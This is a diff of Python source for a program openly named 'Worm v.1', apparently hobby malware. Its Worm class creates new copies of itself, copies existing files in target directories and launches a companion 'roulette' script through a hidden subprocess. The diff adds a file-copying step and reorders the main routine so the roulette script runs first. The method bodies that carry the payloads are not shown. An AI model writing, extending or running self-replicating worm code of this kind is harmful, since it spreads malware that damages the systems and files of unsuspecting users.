--- a/Worm v.1
+++ b/Worm v.1
@@ -200,8 +200,8 @@ class Worm:
             self.rick_bomb()
     
     def run_roulette(self):   
-        os.startfile(f"{self.own_path}\\..\\roulette.py")    
-        # subprocess.Popen([f"{self.own_path}\\..\\roulette.py", sys.argv[0]], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
+        #os.startfile(f"{self.own_path}\\..\\roulette.py")    
+        subprocess.Popen([f"{self.own_path}\\..\\roulette.py", sys.argv[0]], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
     
     def start_worm_actions(self):
         print(self.target_dir_list)
@@ -214,6 +214,7 @@ class Worm:
         try:
             #self.russian_roulette()
             self.create_new_worm()  
+            self.copy_existing_files()
         except:
             logging.warning("something went wrong")
         
@@ -226,8 +227,9 @@ if __name__=="__main__":
     current_directory = os.path.abspath("")
     
     worm = Worm(path=current_directory)
-    worm.start_worm_actions()
     worm.run_roulette()
+    worm.start_worm_actions()
+    
     # with open('log.txt', 'w') as f:
     #     f.write(f"{perf_counter() - worm.start:.5f}")
     
